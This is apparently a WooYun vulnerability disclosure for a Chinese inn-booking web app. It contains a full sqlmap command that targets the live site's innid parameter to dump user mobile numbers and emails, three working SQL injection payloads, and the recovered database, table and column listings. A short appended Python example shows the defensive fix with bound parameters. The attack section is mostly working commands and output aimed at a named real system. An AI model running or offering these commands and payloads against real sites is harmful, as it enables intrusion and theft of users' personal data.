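2015-11-07: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2015-12-22: The vendor has actively ignored the vulnerability; details are disclosed to the public.
The 米途 APP is one of the products of 北京米天下科技有限公司. It is an online room-booking platform with a personal touch, and nearly 4,000 inns and other distinctive lodgings have joined it so far.
Address: http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0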
python sqlmap.py -u "http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0" --random-agent -p innid --technique=BET --batch -D weikezhan -T qy_users -C id,mobile,nickname,email,qyuserid --dump --threads=10
---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
current user: 'weikezhan@%'
current user is DBA: False
database management system users [1]:
[*] 'weikezhan'@'%'

available databases [3]:
[*] information_schema
[*] test
[*] weikezhan

Database: weikezhan
[35 tables]
+-------------------+
| cashier_notifies  |
| cashier_oneqr     |
| cashier_partners  |
| cashier_pays      |
| cashier_qrcodes   |
| cashier_slips     |
| qy_user_actions   |
| qy_users          |
| wkz_like          |
| wx_batch_bills    |
| wx_batches        |
| wx_bills          |
| wx_inns           |
| wx_like           |
| wx_log            |
| wx_mailqueue      |
| wx_messages       |
| wx_order_notifies |
| wx_orderremark    |
| wx_orders         |
| wx_pays           |
| wx_pv_histories   |
| wx_pvs            |
| wx_qrcodes        |
| wx_refunds        |
| wx_scan_history   |
| wx_session        |
| wx_smsmt          |
| wx_systemlogs     |
| wx_templatemsgs   |
| wx_tousu          |
| wx_users          |
| wx_users_vv       |
| wx_warns          |
| yzg_push          |
+-------------------+

Database: weikezhan
Table: wx_users
[16 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| language       | varchar(20)      |
| avatarurl      | varchar(256)     |
| city           | varchar(32)      |
| country        | varchar(32)      |
| firstfollowon  | datetime         |
| followstatus   | smallint(4)      |
| id             | int(11) unsigned |
| lastfollowon   | datetime         |
| lastsyncon     | datetime         |
| lastunfollowon | datetime         |
| nickname       | varchar(32)      |
| openid         | varchar(32)      |
| province       | varchar(32)      |
| sex            | smallint(4)      |
| subscribetime  | int(11)          |
| userfrom       | varchar(10)      |
+----------------+------------------+

Database: weikezhan
Table: qy_users
[10 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| avatarurl     | varchar(256)     |
| email         | varchar(128)     |
| extattr       | varchar(256)     |
| firstfollowon | datetime         |
| followstatus  | smallint(4)      |
| id            | int(11) unsigned |
| mobile        | varchar(16)      |
| nickname      | varchar(32)      |
| openid        | varchar(32)      |
| qyuserid      | varchar(32)      |
+---------------+------------------+

Database: weikezhan
+----------+---------+
| Table    | Entries |
+----------+---------+
| qy_users | 158     |
+----------+---------+

Database: weikezhan
Table: qy_users
[158 entries]
+----+--------+----------+-------+----------+
| id | mobile | nickname | email | qyuserid |
+----+--------+----------+-------+----------+
Add some filtering.
Unable to contact the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)
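The sqlmap payloads above all close a quoted string after `innid=21898`, so the value is being concatenated into a SQL string literal. The following is an added example, not code from the report or from the vendor: it contrasts that pattern with a bound parameter and a strict integer check, using the boolean-based payload from the output above as test input. It assumes an in-memory SQLite database as a stand-in for the MySQL back end and a hypothetical `inns` table.

```python
import re
import sqlite3

# Boolean-based payload for innid exactly as it appears in the sqlmap output above.
PAGE_PAYLOAD = "21898' AND 6804=6804 AND 'lpaQ'='lpaQ"


def make_db():
    """Constructed stand-in: SQLite in memory instead of the MySQL back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE inns (id INTEGER PRIMARY KEY, name TEXT)")  # hypothetical table
    db.execute("INSERT INTO inns VALUES (21898, 'constructed sample inn')")
    return db


def lookup_concatenated(db, innid):
    """The flawed pattern: innid is pasted into a quoted SQL string literal."""
    sql = "SELECT id, name FROM inns WHERE id = '" + innid + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, innid):
    """Bound parameter: innid is passed as data and never parsed as SQL."""
    return db.execute("SELECT id, name FROM inns WHERE id = ?", (innid,)).fetchall()


def lookup_validated(db, innid):
    """Bound parameter plus an allow-list check: innid must be a short decimal id."""
    if not re.fullmatch(r"[0-9]{1,10}", innid):
        raise ValueError("innid must be a decimal integer")
    return lookup_bound(db, int(innid))


def demo():
    """Run the page's payload through all three lookups and collect the outcomes."""
    db = make_db()
    results = {
        "concatenated": lookup_concatenated(db, PAGE_PAYLOAD),
        "bound": lookup_bound(db, PAGE_PAYLOAD),
    }
    try:
        lookup_validated(db, PAGE_PAYLOAD)
        results["validated"] = "accepted"
    except ValueError:
        results["validated"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

The concatenated lookup returns the inn row because the trailing conditions are evaluated as SQL; the bound lookup matches nothing and the validated lookup rejects the value before it reaches the database.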